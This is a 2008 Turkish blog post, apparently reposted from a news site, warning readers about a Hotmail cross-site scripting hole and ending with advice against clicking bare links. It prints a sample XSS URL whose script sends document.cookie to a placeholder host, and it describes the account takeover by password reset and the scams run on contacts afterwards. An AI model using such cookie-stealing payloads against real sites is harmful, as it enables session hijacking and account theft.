logo
feeds

  • Ana Sayfa

Xss Hotmail Hacking Nedir

Mart 3rd, 2008 | Tavsiye Et
Yorum Yaz Yazar: murnes
Kategori: Bilgisayar-Internet

Bedava (Free) bir Hosting’e yerleştiyorlar burada sizin ilginizi çekecek bir site kuruyorlar. Örneğin Öğretmensiniz ve Milli Eğitim Bakanlığının Yeni Öğretmen Atamaları Hakkındaki Genelgesi Hakkında bir bilginiz. Hacker bunu biliyor ve sizin ilginizi çekecek olan bu siteyi kuruyor. Siteyi kurarken için Hotmail’in XSS Güvenlik Açığına neden olan Kod’u yerleştiriyor ve sitenin ismini size E-mail olarak yolluyor.

Xss hotmail hacking nedir ;

Öncelikle Lamer’lar (Lamer= başkasının yazdığı programla yada kod ile hacklerlık taslayan kişilere verilen isimdir. Gerçekte hack konusunda bir bilgisi yoktur yada yok denecek kadar az olan kişiye denilmekte)
Hotmail’in XSS Kodunu
( Bu kod nasıl bişey diye merak edenler için vereyim (Kötü amaçlı kullanılmasın diye çalışmaz aşağıdaki:

http://my.msn.com/newmodule.armx?tab=1&tok=FHtk2MVJqNEyaz7ZCA==&page =1%20<script>alert(”yönlendiriliyorsunuz”)</script>&col=<script>
location.href=”http://localhost/?cookie=”+escape(document.cookie)</script>

Bedava (Free) bir Hosting’e yerleştiyorlar burada sizin ilginizi çekecek bir site kuruyorlar. Örneğin Öğretmensiniz ve Milli Eğitim Bakanlığının Yeni Öğretmen Atamaları Hakkındaki Genelgesi Hakkında bir bilginiz. Hacker bunu biliyor ve sizin ilginizi çekecek olan bu siteyi kuruyor. Siteyi kurarken için Hotmail’in XSS Güvenlik Açığına neden olan Kod’u yerleştiriyor ve sitenin ismini size E-mail olarak yolluyor.

E-mail kutunuza gelen site link’ine tıklarsanız, Bilgisayarınızdaki Cookie(Çerez)’ler hacker’ın sitenin içine yerleştirmiş olduğu Kod sayesinde hacker’a gidiyor. Hacker daha sonra bu Cookie’lerin içinden sizin Hotmail Hesabınıza ait olan Cookileri bulup birkaç kod ekleme işlemi ile değiştirip kaydediyor. Daha sonra kendi bilgisayarından şifresiz olarak sizin E-mail’lerinizi okuyabiliyor.

Peki sadece okumakla yetiniyor mu hacker’lar ? Tabii ki hayır! İşte sadece bir hacker’ın düşünebileceği bir kurnazlık daha gösteriyorlar burada. Hotmail Giriş bölümüne geri geliyorlar ve “ Parolamı Unuttum “ seçeneğine tıklayarak sizin E-mail adresinizi giriyorlar, Şifrenizin E-Posta olarak sizin E-mail hesabına gelmesine neden oluyorlar. Daha sonra şifresiz olarak giriş yapabildikleri için giriyor ve hotmail’in göndermiş olduğu “Kayıp Parola“ İsteği mail’inin içindeki şifrenizi alıyorlar. Ve şifreyi, Gizli Sorunuzu ve ya diğer tüm bilgilerinizi tamamen ele geçirmiş oluyorlar.

Bu Güvenlik Açığından Hotmail’in Haberi Yok mu ? Var ancak şu an için bir çözüm ya-da yama yayınlanmadı. Ülkemizde özellikle son 1 haftada bir çok kişinin E-Posta hesabı bu yöntem ile hack edildi.

Hotmail Hesabınızla Neler Yapılabilir?

Ömcelikle size gelen mailler okunabilir. Tabi çoğu kişi gibi, hotmail türü emailleri sadece üye olduğunuz mail listelerinden gelen mailler için kullanıyor. Siz bu tür bir kullanım yapıyor ve bu nedenle de “önemli değil” diye düşünüyorsanız, yanılıyorsunuz. Çünkü Bilişim Polisinin ülkemizde çok yapıldığını bildirdiği ve uyardığı sibersuçlardan birisi “cep telefonu kontür” hırsızlığı.

Kontür hırsızlığı özellikle internet cafeleri kullanan askerlerin başına geliyordu ama bugünlerde bu açık nedeniyle herkesin başına gelebilir oldu. Hotmailinizi ele geçiren kiş, eğer bir adres defteriniz varsa, o defterdeki kişilere mail atarak, “kontür” ihtiyacınız olduğunu ve göndermesini rica ettiğinizi bildiriyor. Bu yollanan kontürleri de sonra satıyor. Bu yolla epeyce yolunu bulanlar olduğu yine Bilişim Polisi tarafından iletilen bir husus.

Hotmail XSS Güvenlik Açığından Korunmak İçin Neler Yapmalıyız ?

Öncelikle her güvenlik açığı potansiyel bir saldırı nedenidir. Hacker’lar her zaman hedef ve kurban bulurlar. Beni neden hedef alsınlar dediğiniz zaman bilin ki hedefin ta kendisi oldunuz. Bilgi güvenliği, Özel Hayat Güvenliği, Günümüzde oldukça önemli.

Tanımadığınız ya – da tanıdığınız kişilerden sizlere gelen ve içinde sadece site ismi (url) bulunuyorsa o adrese asla tıklamayınız. Tanıdığınız kişilerden de dedim çünkü hacker’lar piyasada dolaşan bir mail hacking programı sayesinde istediği E-Posta hesabindan, İstedikleri E-Posta hesabınıza E-mail gönderebiliyorlar.

Size gelen ve içinde site ismi (URL) bulunan E-mail’leri gönderen kişiyi teyit ettikten sonra açınız.

Internet üzerinde güvenliğiniz için mutlaka ama mutlakan Anti-Virüs ve Güvenlik Duvar (FireWaLL) yazılımlarının İKİSİNİ BİRDEN kullanınınız.
kaynak: turk.internet.com

Nobody Responded To This Post

Subscribes To Comment RSS or TrackBack URL

Yorum

Anasayfa'ya Git Keywords Ve Description Alanları Nelerdir? Ne İşe Yarar? Mahkeme Kararı İle Engellenmiş Sitelere Girmek

 Username

 Email Address

 Website

Please Note: Comment Moderation Maybe Active So There is No Need To Resubmit Your Comments
Benzer Makaleler
  • Algotirma Nedir?
  • Google Sandbox Nedir?
  • Mahkeme Kararı İle Engellenmiş Sitelere Girmek
  • Keywords Ve Description Alanları Nelerdir? Ne İşe Yarar?
  • Sayfalarımda Google Reklamlarını Nereye Yerleştirmeliyim?

stumbleupon

techme


Kategori

  • Beden Dili
  • Bilgisayar-Internet
  • Bilim ve Teknoloji
  • Cep Telefonu
  • Cinsel Yaşam
  • Ekonomi
  • Futbol
  • Genel
  • Haber
  • Kitap Özetleri
  • Magazin
  • Matematik
  • Politika
  • Psikoloji
  • Sağlık
  • Spor
  • Tarih

Arşiv

  • Haziran 2008
  • Mart 2008
  • Şubat 2008
  • Ocak 2008
  • Aralık 2007
  • Kasım 2007
  • Ekim 2007
  • Eylül 2007
  • Ağustos 2007

Bağlantılar

  • Drug Rehab
  • Estetik - Estetik
  • Estetik - Estetik
  • Fishing
  • Parapsychology
  • Sitemap
  • Travel Guide

Meta

  • Kayıt ol
  • Giriş
  • Valid XHTML
  • Valid CSS 3.0
  • WordPress
Temmuz 2008
Pts Sal Çar Per Cum Cts Paz
« Haz    
 123456
78910111213
14151617181920
21222324252627
28293031  

En Son Yazılar

  • Turkiye-Cek Cumhuriyeti Ile Karsilasmasinda Tarih Yazdi
  • Petek Dincoz Deniz Kizi Oldu
  • Ambulansi Taniyan Trafik Isiklari Gelistirildi
  • Bas Savcinin Laiklik Anlayisi
  • Dolarda Yukselis Surer
  • Issizlik Orani Artti
  • Erogan`in Resmi Ters Basilmisti
  • Fatih Terim`in Basin Toplantisi
  • Viyana`ya Turk Yuruyusu
  • Nurgul Yesilcay `Cikolata Yiyerek Zayifliyorum`
  • Pakistan`a Camiye Bombali Saldiri
  • İÇ ÇAMAŞIRI TARİHİ
  • Algotirma Nedir?
  • Google Sandbox Nedir?
  • Mahkeme Kararı İle Engellenmiş Sitelere Girmek
  • Xss Hotmail Hacking Nedir
  • Keywords Ve Description Alanları Nelerdir? Ne İşe Yarar?
  • Sayfalarımda Google Reklamlarını Nereye Yerleştirmeliyim?
  • Arama Motorlarında Üst Sıralarda Çıkmak
  • Elektronik Ticaret Terimler Sözlüğü
  • Neden E-ticaret?
  • Sisteminizi SYN DoS Saldırılarına Karşı Korumak
  • Webmasterın El Kitabı
  • .Htaccess Kullanarak Dosya Uzantılarını Dizin Olarak Okutmak
  • Robots.Txt Nedir ? Ne Değildir ?
  • .htaccess Dosyası Nedir?
  • C++ Programlama Dili
  • C Nasıl Bir Programlama Dilidir?
  • Steganografi
  • Google, Nereden Para Kazanıyor?
  • GÖREV VE ÇOK GÖREVLİ İŞLEM
  • TOPLU İŞLEM VE ETKİLEŞİMLİ İŞLEM
  • Etkileşimli İşlem
  • GERÇEK ZAMANLI İŞLEM
  • Ana İşlem Biriminin Yönetimi
  • Zamanuyumlama İşlevleri
  • Giriş-Çıkış Sistemi
  • Ana Belleğin Yönetimi
  • Kütük Yönetimi
  • Sistem Çağrı Düzeneği
  • Bilgisayar Sistemlerinde Teknolojik Gelişmeler
  • Günümüzde Kurumların Bilgi-İşlem Altyapıları
  • Grafik Yazılımları İle Kolay Yoldan Web Tasarımı
  • FreeHand’de Banner Tasarımı
  • QuarkXPress’te Web Tasarımı
  • Eğer Programlama Dillerinden Anlamıyorsanız İlk Önce Bunlara Bir Bakmakta Fayda Var
  • Directory Listler
  • Hata Nedir ?
  • Ethernet (IEEE 802.3)
  • İşlemci Aktiviteleri, Şifrelemeyi Açığa Çıkarıyor
  • Ascii Karakter Kod Karşılıkları
  • Unreal 3.2.6 Kurulumu
  • Hosting Alırken Dikkat Edilmesi Gerekenler
  • Dmoza Nasıl Kayıt Yapılır
  • Rapishare De Bekleme Süresini Sıfırlamak İçin
  • Routing Information Protocol (RIP)
  • Open Shortest Path First Protocol (OSPF)
  • Border Gateway Protocol (BGP)
  • OSPF Ve RIP Karsilastirmasi
  • Bilgisayar Virüslerinden Korunma
  • Bilgisayar Kurtları
  • DEĞİŞKEN BÖLÜMLÜ BELLEK YÖNETİMİ
  • Bilgisayarın Temel Birimleri
  • Bilgisayarın Temel Birimleri (MIB)
  • Bilgisayarın Temel Birimleri (Bellek Ve Giriş-Çıkış Arabirimi)
  • Buyruklar (3+1 Adresli Bilgisayar)
  • Bellek
  • Salt Oku Bellekler (ROM)
  • Programlanabilir Salt Oku Bellekler (PROM)
  • EPROM
  • EEPROM
  • FLASH
  • Oku/Yaz Bellek ( RAM )
  • Statik Oku/Yaz Bellek
  • Dinamik Oku/Yaz Bellek
  • Bellek Düzeni
  • Belleğin Çalışma Prensibi
  • İki Boyutlu Adresleme
  • Belleğe Erişim
  • Bellek Tasarımı
  • Merkezi İşlem Birimi
  • Merkezi İşlem Birimi
  • Bellek Veri Kütüğü ( BVK )
  • Aritmetik Lojik Birim ( ALB )
  • Buyruklar
  • SCSI Standartı
  • BİLGİSAYAR SİSTEMİNE GİRİŞLERİN DENETLENMESİ
  • Parolaya Dayalı Denetim
  • Kimlik Kartına Dayalı Denetim
  • Fiziksel Özelliklere Dayalı Denetim

En Son Yorumlar

  • ceren in ÖZDEŞLİKLER ve ÇARPANLARA …
  • Pegasus in Öz Farkındalık Depresyonu
  • yıldız in Ram Nedir Nasıl Çalışır
eXTReMe Tracker
Estetik estetik